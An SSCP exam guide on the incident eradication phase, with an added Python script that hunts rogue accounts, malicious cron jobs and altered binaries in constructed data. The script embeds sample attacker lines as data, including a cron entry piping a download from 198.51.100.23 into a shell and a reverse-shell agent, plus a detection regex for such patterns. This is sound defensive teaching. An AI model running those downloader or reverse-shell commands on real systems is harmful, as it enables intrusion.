Incident Eradication – SSCP Exam Guide
What is Incident Eradication?
Incident eradication is a critical phase in the incident response lifecycle that focuses on completely removing the root cause of a security incident from the affected environment. This phase comes after the containment phase and before the recovery phase. The goal is to ensure that all traces of the threat — including malware, backdoors, compromised accounts, and unauthorized access mechanisms — are thoroughly eliminated so the incident does not recur.
Why is Incident Eradication Important?
Eradication is essential because failing to fully remove the threat can lead to:
• Re-infection or recurrence of the same incident
• Persistent backdoors that attackers can exploit later
• Continued data exfiltration or system compromise
• Undermining the recovery phase, making restoration efforts futile
• Regulatory and compliance failures if the organization cannot demonstrate that the threat was fully addressed
Proper eradication ensures the integrity of the environment before systems are returned to normal operations.
How Does Incident Eradication Work?
Eradication involves several key activities:
1. Identifying the Root Cause
The incident response team must determine exactly how the attack occurred. This includes identifying the vulnerability exploited, the attack vector used, and the extent of the compromise. Root cause analysis is fundamental to effective eradication.
2. Removing Malware and Artifacts
All malicious code, scripts, files, tools, and artifacts planted by the attacker must be located and removed. This may involve running antivirus and anti-malware scans, manually inspecting systems, and using forensic tools to identify hidden threats. Signature-based scans alone are not sufficient: custom tooling, living-off-the-land binaries, and web shells are frequently missed, so scan results should be combined with comparison against a known-good baseline and with the indicators of compromise gathered during analysis.
3. Eliminating Backdoors
Attackers often install backdoors to maintain persistent access. These must be found and removed. This includes rogue user accounts, unauthorized remote access tools, modified system binaries, and hidden scheduled tasks or cron jobs, as well as added SSH authorized_keys entries, web shells, and startup or registry run entries. A single persistence mechanism that survives eradication gives the attacker a way back in regardless of how thoroughly the original entry point was closed.
4. Patching and Hardening
The vulnerability that was exploited to gain access must be patched or mitigated. This could involve applying software patches, updating configurations, closing unnecessary ports, or strengthening access controls. If the vulnerability is not addressed, the same attack can succeed again.
5. Rebuilding Compromised Systems
In many cases, the most reliable approach to eradication is to rebuild affected systems from known-good media or trusted backups. Attempting to clean a deeply compromised system may leave hidden threats. Reimaging ensures a clean baseline, with two caveats: a backup is only trusted if it predates the compromise (otherwise the backdoor is restored along with the data), and the rebuilt system must be patched and hardened before it is reconnected, or the same attack vector will compromise it again.
6. Resetting Credentials
All compromised or potentially compromised credentials — passwords, API keys, certificates, and tokens — must be changed. This prevents the attacker from regaining access using stolen credentials. Timing matters: credentials should be rotated once the attacker's access has actually been removed, since an attacker who still has a foothold can simply capture the new ones. Service and machine account credentials are as important as user passwords and are often overlooked.
7. Verifying Eradication
After removal activities, the team must verify that the threat has been fully eliminated. This involves rescanning systems, reviewing logs, and monitoring for signs of continued compromise before transitioning to the recovery phase. Verification should be driven by the indicators of compromise collected during analysis (attacker IP addresses, rogue account names, file hashes, staging paths): if none of them reappear in logs or on disk after eradication, the team has evidence that the threat is gone rather than an assumption.
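As an added example (not part of the SSCP guide), the following Python script walks steps 3, 5 and 7 above on constructed sample data: it hunts a fake passwd file for rogue UID 0 or unexpected accounts, flags crontab entries with downloader or reverse-shell patterns, compares binary hashes against a known-good baseline, turns the findings into indicators of compromise, and then checks post-eradication log lines for any recurrence. The account names, the TEST-NET-2 address 198.51.100.23, the hashes and the log lines are all invented for the example, and the regex patterns are illustrative rather than a complete detection set.

```python
"""Persistence hunt and eradication verification over constructed sample data.
Added example for this guide, not SSCP material: every input below is constructed
inline (fake passwd, crontab, hash baseline, log lines); IOC patterns are illustrative."""
import hashlib
import re

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
sysupd:x:0:0::/tmp/.x:/bin/bash
"""
CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://198.51.100.23/a.sh | sh
@reboot /dev/shm/.cache/agent -c 198.51.100.23:4444
"""
# SHA-256 of each binary as recorded before the incident vs. as found now (constructed).
BASELINE_HASHES = {
    "/bin/ls": hashlib.sha256(b"ls-known-good").hexdigest(),
    "/usr/bin/sshd": hashlib.sha256(b"sshd-known-good").hexdigest(),
}
CURRENT_HASHES = {
    "/bin/ls": hashlib.sha256(b"ls-known-good").hexdigest(),
    "/usr/bin/sshd": hashlib.sha256(b"sshd-trojaned").hexdigest(),
}
EXPECTED_ACCOUNTS = {"root", "daemon", "www-data", "alice"}
ATTACKER_IP = "198.51.100.23"  # TEST-NET-2 address, constructed for the example

# Command fragments that commonly mark a downloader, dropper or reverse shell.
SUSPICIOUS_CRON = re.compile(
    r"(curl|wget)[^|]*\|\s*(ba)?sh"      # download piped straight into a shell
    r"|base64\s+(-d|--decode)"           # encoded payload being unpacked
    r"|/dev/shm/|/tmp/|/\.[A-Za-z0-9_]"  # staging in temp or hidden directories
    r"|\bnc\b|/dev/tcp/"                 # netcat or bash network redirection
)

def find_rogue_accounts(passwd_text, expected):
    """Accounts with UID 0 that are not root, or that the baseline never had."""
    rogue = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid = line.split(":")[:3]
        if (uid == "0" and name != "root") or name not in expected:
            rogue.append(name)
    return rogue

def find_suspicious_cron(crontab_text):
    """Crontab command strings that match a persistence pattern."""
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        # '@reboot'-style entries have one schedule field, others have five.
        command = line.split(None, 1 if line.startswith("@") else 5)[-1]
        if SUSPICIOUS_CRON.search(command):
            hits.append(command)
    return hits

def find_modified_binaries(baseline, current):
    """Paths whose current hash no longer matches the known-good baseline."""
    return sorted(p for p, h in baseline.items() if current.get(p) != h)

def iocs_from_findings(rogue, cron_hits, attacker_ip):
    """Indicators to watch for after eradication: names, IPs, staging paths."""
    iocs = set(rogue) | {attacker_ip}
    for cmd in cron_hits:
        iocs.update(re.findall(r"/(?:dev/shm|tmp)/\S+", cmd))
    return iocs

def verify_eradication(post_logs, iocs):
    """Log lines written after eradication that still mention an indicator."""
    return [line for line in post_logs if any(ioc in line for ioc in iocs)]

# Constructed post-eradication log samples: one clean, one showing recurrence.
POST_LOGS_CLEAN = [
    "sshd[912]: Accepted publickey for alice from 10.0.0.5 port 51022",
    "CRON[1001]: (root) CMD (/usr/local/bin/backup.sh)",
]
POST_LOGS_RECURRENCE = POST_LOGS_CLEAN + [
    "sshd[977]: Accepted password for sysupd from 198.51.100.23 port 40110",
]

def run_hunt():
    """Steps 3 and 5 of the guide: enumerate persistence, then derive IOCs."""
    rogue = find_rogue_accounts(PASSWD, EXPECTED_ACCOUNTS)
    cron_hits = find_suspicious_cron(CRONTAB)
    modified = find_modified_binaries(BASELINE_HASHES, CURRENT_HASHES)
    return rogue, cron_hits, modified, iocs_from_findings(rogue, cron_hits, ATTACKER_IP)

if __name__ == "__main__":
    rogue, cron_hits, modified, iocs = run_hunt()
    print("rogue accounts:", rogue, "\nsuspicious cron:", cron_hits)
    print("modified binaries:", modified, "\nIOCs to monitor:", sorted(iocs))
    # Step 7: a clean post-eradication log yields no hits; a recurrence does.
    print("clean logs:", verify_eradication(POST_LOGS_CLEAN, iocs))
    print("recurrence:", verify_eradication(POST_LOGS_RECURRENCE, iocs))
```

The design point is the last function: the same indicators that drove the hunt are what verification looks for afterwards. On the constructed data the clean log set returns nothing, while the second set surfaces a login by the removed account from the attacker's address, which is the signal to loop back from recovery to eradication rather than declaring the incident closed.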
Eradication in the Incident Response Lifecycle
The standard incident response phases are:
1. Preparation
2. Detection and Analysis (Identification)
3. Containment
4. Eradication
5. Recovery
6. Lessons Learned (Post-Incident Activity)
Eradication sits between containment and recovery. Containment stops the spread of the incident, eradication removes the threat, and recovery restores systems to normal operations. These phases sometimes overlap and may be iterative. Note that NIST SP 800-61 Rev. 2 groups them into a single "Containment, Eradication, and Recovery" phase; the six-phase list above is the breakdown commonly used in the SSCP domain, and both models describe the same sequence of work.
Key Concepts to Remember for the Exam
• Eradication is about removing the root cause and all traces of the attack
• It is performed after containment and before recovery
• Rebuilding from trusted media is often preferred over attempting to clean a compromised system
• Patching the exploited vulnerability is a critical part of eradication
• Credential resets are a necessary component
• Eradication must be verified before moving to recovery
• The eradication phase may require coordination with forensics teams to ensure evidence is preserved
Exam Tips: Answering Questions on Incident Eradication
1. Know the order of incident response phases. Many exam questions test whether you can correctly sequence the phases. Remember: Preparation → Detection/Identification → Containment → Eradication → Recovery → Lessons Learned. If a question asks what comes after containment, the answer is eradication.
2. Distinguish eradication from containment and recovery. Containment is about stopping the spread and limiting damage. Eradication is about removing the threat entirely. Recovery is about restoring systems to normal operation. If a question describes removing malware and patching vulnerabilities, it is describing eradication.
3. Look for keywords in the question. Terms like "root cause removal," "eliminating the threat," "removing malware," "patching vulnerabilities," and "rebuilding systems" all point to eradication.
4. Rebuilding vs. cleaning. If a question asks about the most thorough or reliable method of eradication, rebuilding from known-good media or trusted backups is typically the best answer. Cleaning a system may miss deeply embedded threats.
5. Remember the connection to vulnerability remediation. Eradication includes addressing the vulnerability that allowed the attack. If the vulnerability is not fixed, the attacker or another threat actor can exploit it again.
6. Evidence preservation matters. In exam scenarios, if you are asked about eradication while an investigation is ongoing, remember that forensic evidence should be collected and preserved before eradication activities modify or destroy evidence.
7. Watch for scenario-based questions. The SSCP exam often presents scenarios where you must choose the correct action. If a system has been contained and the question asks for the next step, focus on eradication activities such as removing malware, patching, or rebuilding.
8. Credential management during eradication. If a question mentions compromised user accounts or stolen passwords, remember that resetting credentials is part of the eradication process, not just recovery.
9. Verification is part of eradication. Do not move to recovery until eradication is confirmed. If an exam question asks what should be done before restoring systems to production, the answer involves verifying that the threat has been fully removed.
10. Iterative nature. Some questions may test whether you understand that incident response phases can be iterative. If new threats are discovered during recovery, you may need to return to eradication.